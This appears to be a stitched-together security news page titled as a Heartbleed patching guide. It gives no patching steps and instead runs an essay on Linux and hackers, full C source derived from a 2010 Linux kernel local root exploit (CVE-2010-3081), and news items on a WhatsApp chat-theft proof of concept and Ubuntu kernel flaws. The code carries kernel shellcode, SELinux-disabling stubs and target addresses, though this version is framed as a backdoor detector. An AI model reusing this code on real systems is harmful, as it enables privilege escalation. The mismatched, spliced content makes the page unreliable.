How to patch your server against The Heartbleed Bug
What is the Heartbleed Bug?
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library.
Linux use is growing at an amazing rate. This operating system, which has no public relations department, advertising, or government lobby, is being used widely in homes and server rooms alike. It’s also free, and 100% open source, meaning anyone can look at each and every line of code in the Linux kernel.
Linux is a true multiuser operating system, and has been since the very first version. It is powerful in its simplicity. Though there are robust graphical environments and tools, you can still do everything you could possibly need with just a keyboard and a shell prompt. Since you have the code, you could even make Linux do things it was never meant to.
That’s one of the things that draws both the gurus and the attackers alike.
The black-hats have thronged to Linux. It allows them the control they require to do strange and ingenious things. If they want to experiment with new or invalid network packets, they can do so easily without relying on undocumented (or non-existent) API support from the vendor.
Millions of lines of code have been written for Linux applications and libraries, usually in an extremely modular manner, which allows it to be integrated into widely diverse projects. For example a library that allows you to sniff the network for proactive performance monitoring could be used as part of network hijacking code.
The power and flexibility of Linux makes it the hacker’s playground. They use it, learn it, and understand it intimately. And that means that if there’s an insecurity, they’re going to find it.
However, the very reasons the hackers like Linux are the same reasons more folks are installing it on their own systems today. The ability to look at each and every line of Linux code, and patch it when problems arise, means that Linux can be secured not just by a few programmers locked away in some corporate headquarters, but by any user at any time.
Kernel-2.6.18-164 2010 Local Root Exploit
Save this code as a c program file.
Code:
/*
kernel-2.6.18-164 2010 Local Root Exploit
=========================================
# Author: Hackeri-AL
# Email : h-al [at] hotmail [dot] it
# Group : UAH / United ALBANIA Hackers
# Web : uah1.org.uk
# Greetz: LoocK3D - b4cKd00r ~
--------------------------------------------
Diagnostic test for CVE-2010-3081 public exploit
Greg Price, Ksplice, Inc.

Tests whether the system has previously been exposed to the exploit
published as "hackerial.c" by Hackeri-AL on 2010 Sep 15. Based on the
original exploit code.

For more information, see
http://www.ksplice.com/uptrack/cve-2010-3081

Source: http://inj3ct0r.com/exploits/14333
*/

#define _GNU_SOURCE
#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/resource.h>
#include <errno.h>

#define __dgdhdytrg55          unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__     memcpy

#define BANNER \
    "Diagnostic tool for public CVE-2010-3081 exploit -- Ksplice, Inc.\n" \
    "(see http://www.ksplice.com/uptrack/cve-2010-3081)\n" \
    "\n"

#define KALLSYMS              "/proc/kallsyms"
#define TMAGIC_66TDFDRTS      "/proc/timer_list"
#define SELINUX_PATH          "/selinux/enforce"
#define RW_FOPS               "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD  "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD  "revert_creds"

#define Y0Y0SMAP  0x100000UL
#define Y0Y0CMAP  0x200000UL
#define Y0Y0STOP  (Y0Y0SMAP + 0xFFC)
#define J0J0S     0x00200000UL
#define J0J0R00T  0x002000F0UL
#ifndef PAGE_SIZE
#define PAGE_SIZE 0x1000
#endif

#define KERN_DHHDYTMLADSFPYT              0x1
#define KERN_DGGDYDTEGGETFDRLAK           0x2
#define KERN_HHSYPPLORQTWGFD              0x4
#define KERN_DIS_GGDYYTDFFACVFD_IDT       0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS   0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20
#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX  0x40

#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver, ".el5"))

#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while (0)
#define __pppp_tegddewyfg(s)         do { fprintf(stdout, "%s", s); } while (0)
/* #define __print_verbose(s) do { fprintf(stdout, "%s", s); } while (0) */
#define __print_verbose(s)           do { } while (0)
#define __xxxfdgftr_hshsgdt(s)       do { perror(s); exit(-1); } while (0)
#define __yyy_tegdtfsrer(s)          do { fprintf(stderr, s); exit(-1); } while (0)

static char buffer[1024];
static int flags = 0;
static volatile socklen_t magiclen = 0;
static int useidt = 1, usefops = 0, uselsm = 0;
static __yyrhdgdtfs66ytgetrfd _m_fops = 0, _m_cred[3] = { 0, 0, 0 };
static __dgdhdytrg55 _m_cpu_off = 0;
static char krelease[64];
static char kversion[128];

/* ring-0 payload, "standard" variant: the caller's uid is patched in at R0C_0FF */
#define R0C_0FF 14
static char ttrg0ccc[] =
    "\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"
    "\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"
    "\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"
    "\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"
    "\xeb\xcc\x5e\x5b\x5f\x59\xc3";

/* ring-0 payload, "cred" variant: prepare_creds / override_creds / revert_creds
 * addresses are patched in at the three offsets below */
#define R0YTTTTUHLFSTT_OFF1         5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD      45
char r1ngrrrrrrr[] =
    "\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"
    "\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"
    "\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"
    "\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"
    "\xff\xd3\x5f\x5f\x5a\x5b\xc3";

/* fops/LSM trampoline: per_cpu offset, payload address and (optionally)
 * the SELinux-disable stub are patched in at the offsets below */
#define RJMPDDTGR_OFF          13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25
static char ttrfd0[] =
    "\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
    "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
    "\x58\x5f"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xc3";

/* implement selinux bypass for IDT ! */
#define RJMPDDTGR_OFF_IDT           14
#define RJMPDDTGR_DYHHTSFDARE       8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27
static char ruujhdbgatrfe345[] =
    "\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
    "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
    "\x0f\x01\xf8"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x48\xcf";

/* SELinux-disable stub: selinux_enforcing and audit_enabled addresses patched in */
#define CJE_4554TFFDTRMAJHD_OFF        10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23
static char dis4blens4sel1nuxhayettgdr64545[] =
    "\x41\x52\x50"
    "\xb8\x00\x00\x00\x00"
    "\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x89\x02"
    "\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
    "\x41\x89\x02"
    "\x58\x41\x5a";

/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98
struct LSM_rhel {
    __yyrhdgdtfs66ytgetrfd selinux_ops;
    __yyrhdgdtfs66ytgetrfd capability_ops;
    __yyrhdgdtfs66ytgetrfd dummy_security_ops;
    __yyrhdgdtfs66ytgetrfd selinux_enforcing;
    __yyrhdgdtfs66ytgetrfd audit_enabled;
    const char *krelease;
    const char *kversion;
};

/* known RHEL kernels: symbol addresses keyed on exact uname release/version */
struct LSM_rhel known_targets[4] = {
    {
        0xffffffff8031e600ULL,
        0xffffffff8031fec0ULL,
        0xffffffff804acc00ULL,
        0xffffffff804af960ULL,
        0xffffffff8049b124ULL,
        "2.6.18-164.el5",
        "#1 SMP Thu Sep 3 03:28:30 EDT 2009"   // to manage minor/bug fix changes
    },
    {
        0xffffffff8031f600ULL,
        0xffffffff80320ec0ULL,
        0xffffffff804afc00ULL,
        0xffffffff804b2960ULL,
        0xffffffff8049e124ULL,
        "2.6.18-164.11.1.el5",
        "#1 SMP Wed Jan 6 13:26:04 EST 2010"
    },
    {
        0xffffffff805296a0ULL,
        0xffffffff8052af60ULL,
        0xffffffff806db1e0ULL,
        0xffffffff806ddf40ULL,
        0xffffffff806d5324ULL,
        "2.6.18-164.11.1.el5xen",
        "#1 SMP Wed Jan 20 08:06:04 EST 2010"   // default xen
    },
    {
        0xffffffff8031f600ULL,   // d selinux_ops
        0xffffffff80320ec0ULL,   // d capability_ops
        0xffffffff804afc00ULL,   // B dummy_security_ops
        0xffffffff804b2960ULL,   // B selinux_enforcing
        0xffffffff8049e124ULL,   // B audit_enabled
        "2.6.18-164.11.1.el5",
        "#1 SMP Wed Jan 20 07:32:21 EST 2010"   // tripwire target LoL
    }
};

static struct LSM_rhel *curr_target = NULL, dyn4nt4n1labeggeyrthryt;

static int isSelinuxEnabled(void)
{
    FILE *selinux_f;

    selinux_f = fopen(SELINUX_PATH, "r");
    if (selinux_f == NULL) {
        if (errno == EPERM)
            return 1;
        else
            return 0;
    }
    fclose(selinux_f);
    return 1;
}

/* fills out_release/out_version from uname() and returns the kernel
 * minor number (the "18" of 2.6.18), or -1 on failure */
static int wtfyourunhere_heee(char *out_release, char *out_version)
{
    int ret;
    const char *ptr;
    int count = 0;
    char r[32], *bptr;
    struct utsname buf;

    ret = uname(&buf);
    if (ret < 0)
        return -1;
    strcpy(out_release, buf.release);
    strcpy(out_version, buf.version);
    ptr = buf.release;
    bptr = r;
    memset(r, 0x00, sizeof(r));
    while (*ptr) {
        if (count == 2) {
            if (*ptr >= '0' && *ptr <= '9')
                *bptr++ = *ptr;
            else
                break;
        }
        if (*ptr == '.')
            count++;
        ptr++;
    }
    if (strlen(r) < 1 || !atoi(r))
        return -1;
    return atoi(r);
}

static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
    *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
    *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
    __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545) - 1);
    __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545) - 1);
}

/* looks up symbol s in a kallsyms/System.map style file ("addr type name" per line) */
static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char *s, const char *filename, int ignore_flag)
{
    FILE *ka;
    char line[512];
    char reloc_a[64];
    char reloc[64];

    if (!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
        return 0;
    ka = fopen(filename, "r");
    if (!ka)
        return 0;
    while (fgets(line, 512, ka) != NULL) {
        char *l_p = line;
        char *ra_p = reloc_a;
        char *r_p = reloc;
        memset(reloc, 0x00, sizeof(reloc));
        memset(reloc_a, 0x00, sizeof(reloc_a));
        while (*l_p != ' ' && (ra_p - reloc_a) < 64)
            *ra_p++ = *l_p++;
        l_p += 3;   /* skip " T " (separator, type char, separator) */
        while (*l_p != '\n' && *l_p != '\t' && *l_p != ' ' && (r_p - reloc) < 64)
            *r_p++ = *l_p++;
        if (!strcmp(reloc, s)) {
            fclose(ka);
            return strtoull(reloc_a, NULL, 16);
        }
    }
    fclose(ka);
    return 0;
}

static inline __yyrhdgdtfs66ytgetrfd get_sym(const char *s)
{
    return get_sym_ex(s, KALLSYMS, 0);
}

/* parses "hex,hex,hex" from the -c option into _m_cred[] */
static int parse_cred(const char *val)
{
    int i = 0;
    const char *p = val;
    char local[64], *l;

    for (i = 0; i < 3; i++) {
        memset(local, 0x00, sizeof(local));
        l = local;
        while (*p && *p != ',')
            *l++ = *p++;
        if (!(*p) && i != 2)
            return -1;
        _m_cred[i] = strtoull(local, NULL, 16);
        p++;
    }
    return 0;
}

#define SELINUX_OPS        "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS     "capability_ops"
#define SELINUX_ENFORCING  "selinux_enforcing"
#define AUDIT_ENABLED      "audit_enabled"

struct LSM_rhel *lsm_rhel_find_target(int check_rhel)
{
    int i;
    char mapbuf[128];
    struct LSM_rhel *lsm = &(known_targets[0]);

    if (check_rhel && !isRHHGDPPLADSF(krelease)) {
        __pppp_tegddewyfg("!!! Not a RHEL kernel, will skip LSM method\n");
        return NULL;
    }
    __print_verbose("$$$ Looking for known RHEL kernels..\n");
    for (i = 0; i < sizeof(known_targets) / sizeof(struct LSM_rhel); i++, lsm++) {
        if (!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion)) {
            __gggdfstsgdt_dddex("$$$ Known target kernel: %s %s\n", lsm->krelease, lsm->kversion);
            return lsm;
        }
    }
    __print_verbose("$$$ Locating symbols for new target...\n");
    strcpy(mapbuf, "/boot/System.map-");
    strcat(mapbuf, krelease);
    dyn4nt4n1labeggeyrthryt.selinux_ops = get_sym_ex(SELINUX_OPS, mapbuf, 1);
    dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
    dyn4nt4n1labeggeyrthryt.capability_ops = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
    dyn4nt4n1labeggeyrthryt.selinux_enforcing = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
    dyn4nt4n1labeggeyrthryt.audit_enabled = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);
    if (!dyn4nt4n1labeggeyrthryt.selinux_ops ||
        !dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
        !dyn4nt4n1labeggeyrthryt.capability_ops ||
        !dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
        !dyn4nt4n1labeggeyrthryt.audit_enabled)
        return NULL;
    return &dyn4nt4n1labeggeyrthryt;
}

void error_no_symbol(const char *symbol)
{
    fprintf(stderr,
            "!!! Could not find symbol: %s\n"
            "\n"
            "A symbol required by the published exploit for CVE-2010-3081 is not\n"
            "provided by your kernel. The exploit would not work on your system.\n",
            symbol);
    exit(-1);
}

static void put_your_hands_up_hooker(int argc, char *argv[])
{
    int fd, ver, ret;
    char __b[16];

    fd = open(KALLSYMS, O_RDONLY);
    ret = (fd >= 0) ? read(fd, __b, 16) : -1;   // dummy read
    if (fd >= 0 && ret > 0) {
        __print_verbose("$$$ can read /proc/kallsyms, will use for convenience\n");   // d0nt p4tch m3 br0
        flags |= KERN_HHSYPPLORQTWGFD;
    }
    if (fd >= 0)
        close(fd);
    ver = wtfyourunhere_heee(krelease, kversion);
    if (ver < 0)
        __yyy_tegdtfsrer("!!! uname failed\n");
    __gggdfstsgdt_dddex("$$$ Kernel release: %s\n", krelease);
    if (argc != 1) {
        while ((ret = getopt(argc, argv, "sflc:k:o:")) > 0) {
            switch (ret) {
            case 'f':
                flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM | KERN_DIS_GGDYYTDFFACVFD_IDT;
                break;
            case 'l':
                flags |= KERN_DIS_GGDYYTDFFACVFD_IDT | KERN_DIS_DGDGHHYTTFSR34353_FOPS;
                break;
            case 'c':
                if (!optarg || parse_cred(optarg) < 0)
                    __yyy_tegdtfsrer("!!! Unable to parse cred codes\n");
                break;
            case 'k':
                if (optarg)
                    _m_fops = strtoull(optarg, NULL, 16);
                else
                    __yyy_tegdtfsrer("!!! Unable to parse fops numbers\n");
                break;
            case 's':
                if (!isSelinuxEnabled())
                    __pppp_tegddewyfg("??? -s ignored: SELinux not enabled\n");
                else
                    flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
                break;
            case 'o':
                if (optarg)
                    _m_cpu_off = strtoull(optarg, NULL, 16);
                else
                    __yyy_tegdtfsrer("!!! Unable to parse cpu_off numbers\n");
                break;
            }
        }
    }
    if (ver >= 29) {   // needs cred structure
        flags |= KERN_DGGDYDTEGGETFDRLAK;
        if (!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) {
            _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
            _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD);
            _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
        }
        if (!_m_cred[0])
            error_no_symbol("prepare_creds");
        if (!_m_cred[1])
            error_no_symbol("override_creds");
        if (!_m_cred[2])
            error_no_symbol("revert_creds");
        __print_verbose("$$$ Kernel credentials detected\n");
        *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
        *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
        *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
    }
    if (ver >= 30) {   // needs cpu offset
        flags |= KERN_DHHDYTMLADSFPYT;
        if (!_m_cpu_off)
            _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);
        if (!_m_cpu_off)
            error_no_symbol("per_cpu__current_task");
        __print_verbose("$$$ Kernel per_cpu relocs enabled\n");
        *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
        *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
    }
}

static void env_prepare(int argc, char *argv[])
{
    put_your_hands_up_hooker(argc, argv);
    if (!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS)) {   // try fops
        __print_verbose("??? Trying the timer_list_fops method\n");
        if (!_m_fops)
            _m_fops = get_sym(RW_FOPS);
        /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
         * Thanks to the guy who killed this vector... you know who you are :)
         * Lucky for you, there are more :)
         */
        if (_m_fops) {
            usefops = 1;
        }
    }
    if (!(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) {   // try lsm (rhel)
        __print_verbose("??? Trying the LSM method\n");
        curr_target = lsm_rhel_find_target(1);
        if (!curr_target) {
            __print_verbose("!!! Unable to find target for LSM method\n");
        } else {
            uselsm = 1;
        }
    }
    if (useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) {
        // -i flag
        curr_target = lsm_rhel_find_target(0);
        if (!curr_target) {
            __pppp_tegddewyfg("!!! Unable to find target: continue without SELinux disabled\n");
            /* remove Selinux Flag */
            flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
        }
    }
    if (!usefops && !useidt && !uselsm)
        __yyy_tegdtfsrer("!!! All exploit methods failed.\n");
}

static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack)
{
    int socklen_l = 8 + stack - addr - 16;
    return socklen_l;
}

static void __setmcbuffer(__dgdhdytrg55 value)
{
    int i;
    __dgdhdytrg55 *p = (__dgdhdytrg55 *)buffer;
    for (i = 0; i < sizeof(buffer) / sizeof(void *); i++)
        *(p + i) = value;
}

static void y0y0stack(void)
{
    void *map = mmap((void *)Y0Y0SMAP,
                     PAGE_SIZE,
                     PROT_READ | PROT_WRITE,
                     MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED,
                     -1, 0);
    if (MAP_FAILED == map)
        __xxxfdgftr_hshsgdt("mmap");
}

static void y0y0code(void)
{
    void *map = mmap((void *)Y0Y0CMAP,
                     PAGE_SIZE,
#ifdef TRY_REMAP_DEFAULT
                     PROT_READ | PROT_WRITE,
#else
                     PROT_READ | PROT_WRITE | PROT_EXEC,
#endif
                     MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED,
                     -1, 0);
    if (MAP_FAILED == map)
        __xxxfdgftr_hshsgdt("mmap");
}

static int rey0y0code(unsigned long old)
{
    int fd;
    void *map;
    volatile char wizard;
    char cwd[1024];

    getcwd(cwd, sizeof(cwd));
    strcat(cwd, "/__tmpfile");
    unlink(cwd);
    fd = open(cwd, O_RDWR | O_CREAT, S_IRWXU);
    if (fd < 0)
        return -1;
    write(fd, (const void *)old, PAGE_SIZE);
    if (munmap((void *)old, PAGE_SIZE) < 0)
        return -1;
    map = mmap((void *)old,
               PAGE_SIZE,
               PROT_READ | PROT_EXEC,
               MAP_PRIVATE | MAP_FIXED,
               fd, 0);
    if (map == MAP_FAILED)
        return -1;
    /* avoid lazy page fault handler
     * Triple Fault when using idt vector
     * and no pages are already mapped :)
     */
    wizard = *((char *)old);
    unlink(cwd);
    return wizard;
}

void finish_shellcode(void)
{
    /* set shellcode level 2 */
    if (flags & KERN_DGGDYDTEGGETFDRLAK) {
        __print_verbose("$$$ Using cred shellcode\n");
        __dhdyetgdfstreg__((void *)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
    } else {
        __print_verbose("$$$ Using standard shellcode\n");
        __dhdyetgdfstreg__((void *)J0J0R00T, ttrg0ccc, sizeof(ttrg0ccc));
        *((unsigned int *)(J0J0R00T + R0C_0FF)) = getuid();
    }
#ifdef TRY_REMAP_DEFAULT
    if (rey0y0code(Y0Y0CMAP) < 0)
        __yyy_tegdtfsrer("!!! Unable to remap\n");
#endif
}

int method_idt_main(void)
{
    __yyrhdgdtfs66ytgetrfd *patch;

    __print_verbose("$$$ Building shellcode - IDT method\n");
    patch = (__yyrhdgdtfs66ytgetrfd *)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
    if (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX) {
        __print_verbose("$$$ including code to disable SELinux\n");
        p4tch_sel1nux_codztegfaddczda(curr_target);
    }
    __dhdyetgdfstreg__((void *)J0J0S, ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
    finish_shellcode();
    asm volatile("int $0xdd\n");
    return (getuid() == 0);
}

int method_idt(void)
{
    /* method_idt_main() crashes if no backdoor is present, so protect ourselves */
    int pid;
    int status;

    pid = fork();
    if (pid < 0) {
        __xxxfdgftr_hshsgdt("!!! fork() failed");
        return 0;   // error
    }
    if (pid == 0) {
        int r;
        struct rlimit rlim = { 0, 0 };
        setrlimit(RLIMIT_CORE, &rlim);
        r = method_idt_main();
        exit(r ? 0 : 1);
    }
    waitpid(pid, &status, 0);
    if (status == 0)
        return method_idt_main();
    else
        return 0;
}

void prepare_fops_lsm_shellcode(void)
{
    __yyrhdgdtfs66ytgetrfd *patch;

    __print_verbose("$$$ Building shellcode - fops/LSM method\n");
    patch = (__yyrhdgdtfs66ytgetrfd *)(ttrfd0 + RJMPDDTGR_OFF);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
    __setmcbuffer(J0J0S);
    if (uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) {
        __print_verbose("$$$ including code to disable SELinux\n");
        p4tch_sel1nux_codztegfaddczda(curr_target);
    }
    __dhdyetgdfstreg__((void *)J0J0S, ttrfd0, sizeof(ttrfd0));
    finish_shellcode();
}

int method_fops(void)
{
    int fd;
    struct pollfd pfd;

    prepare_fops_lsm_shellcode();
    fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
    if (fd < 0)
        __xxxfdgftr_hshsgdt("!!! could not open /proc/timer_list");
    pfd.fd = fd;
    pfd.events = POLLIN | POLLOUT;
    poll(&pfd, 1, 0);
    return (getuid() == 0);
}

int method_lsm(void)
{
    int msqid;

    prepare_fops_lsm_shellcode();
    msqid = msgget(0, IPC_PRIVATE | 0600);
    if (msqid < 0)
        __xxxfdgftr_hshsgdt("!!! msgget() failed");
    msgctl(msqid, IPC_RMID, (struct msqid_ds *)NULL);   // exploit it
    return (getuid() == 0);
}

int main(int argc, char *argv[])
{
    int done;

    printf(BANNER);
    if (getuid() == 0) {
        fprintf(stderr, "!!! Must run as non-root.\n");
        return 1;
    }
    env_prepare(argc, argv);
    y0y0stack();
    y0y0code();

    done = 0;
    __pppp_tegddewyfg("$$$ Backdoor in LSM (1/3): ");
    if (uselsm) {
        __pppp_tegddewyfg("checking... ");
        done = method_lsm();
        if (done)
            __pppp_tegddewyfg("PRESENT\n");
        else
            __pppp_tegddewyfg("not present.\n");
    } else {
        __pppp_tegddewyfg("not available.\n");
    }
    if (!done) {
        __pppp_tegddewyfg("$$$ Backdoor in timer_list_fops (2/3): ");
        if (usefops) {
            __pppp_tegddewyfg("checking... ");
            done = method_fops();
            if (done)
                __pppp_tegddewyfg("PRESENT\n");
            else
                __pppp_tegddewyfg("not present.\n");
        } else {
            __pppp_tegddewyfg("not available.\n");
        }
    }
    if (!done) {
        __pppp_tegddewyfg("$$$ Backdoor in IDT (3/3): ");
        if (useidt) {
            __pppp_tegddewyfg("checking... ");
            fflush(stdout);
            done = method_idt();
            if (done)
                __pppp_tegddewyfg("PRESENT\n");
            else
                __pppp_tegddewyfg("not present.\n");
        } else {
            __pppp_tegddewyfg("NOT CHECKING\n");
        }
    }
    munmap((void *)Y0Y0CMAP, PAGE_SIZE);

    /* exec */
    if (getuid() == 0) {
        pid_t pid;
        printf("\n"
               "Your in-memory kernel HAS A BACKDOOR that may have been left\n"
               "by the published exploit for CVE-2010-3081.\n"
               "\n"
               "More information is available at\n"
               "  http://www.ksplice.com/uptrack/cve-2010-3081\n");
        if (0) {
            /* spawn root shell as demonstration */
            pid = fork();
            if (pid == 0) {
                char *args[] = { "/bin/sh", "-i", NULL };
                char *envp[] = { "TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0",
                                 "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
                execve("/bin/sh", args, envp);
            } else {
                int status;
                waitpid(pid, &status, 0);
            }
        }
    } else {
        printf("\n"
               "Your system is free from the backdoors that would be left in memory\n"
               "by the published exploit for CVE-2010-3081.\n");
    }
    return 0;
}
A security consultant has uncovered a security hole in WhatsApp, the instant messaging platform recently acquired by Facebook. The flaw can be leveraged to gain access to the private chats of Android device owners.
Many people are concerned with the privacy implications that come with Facebook’s acquisition of WhatsApp. However, as Bas Bosschert, the man who identified the vulnerability, highlights, Facebook didn’t need to buy the company if all it wanted to do was read users’ chats.
The expert has found that any Android app that’s allowed access to the SD card installed on the device can easily access private conversations.
All chats are saved in a database file (msgstore.db) that’s stored on the SD card. Bosschert has developed a proof-of-concept which demonstrates that any app that’s granted permission to access the card can easily retrieve the database and upload it to a remote server.
According to Bosschert, in newer versions of WhatsApp, the database file is encrypted. However, this doesn’t mean that users’ private chats are secure. It simply means that an attacker would have to decrypt the database file to gain access to its contents.
The decryption key can be found in WhatsApp Xtract, an app that allows users to create backups of WhatsApp conversations.
The POC developed by the expert is designed so that when the database is retrieved, the victim only sees a simple loading screen. Cybercriminals could combine the data-stealing code with a popular application to harvest a large number of databases.
In February, security researchers from Praetorian revealed finding a number of SSL-related vulnerabilities in WhatsApp. Most of them were fixed almost immediately by the company.
Source: Softpedia
Security issues affect Ubuntu 13.10 and its derivatives.
Saran Neti reported a flaw in the IPv6 UDP Fragmentation Offload (UFO) in the Linux kernel. A remote attacker could exploit this flaw to cause a denial of service (panic).
Mathy Vanhoef discovered an error in the way the ath9k driver was handling the BSSID masking. A remote attacker could exploit this error to discover the original MAC address after a spoofing attack.
Andrew Honig reported a flaw in the Linux kernel’s kvm_vm_ioctl_create_vcpu function of the Kernel Virtual Machine (KVM) subsystem. A local user could exploit this flaw to gain privileges on the host machine.
Andrew Honig reported a flaw in the apic_get_tmcct function of the Kernel Virtual Machine (KVM) subsystem of the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service or host OS system crash.
Andrew Honig reported an error in the Linux kernel’s Kernel Virtual Machine (KVM) VAPIC synchronization operation. A local user could exploit this flaw to gain privileges or cause a denial of service (system crash).
Various other issues were also addressed.
Source: Ubuntu
Reference: hackerschronicle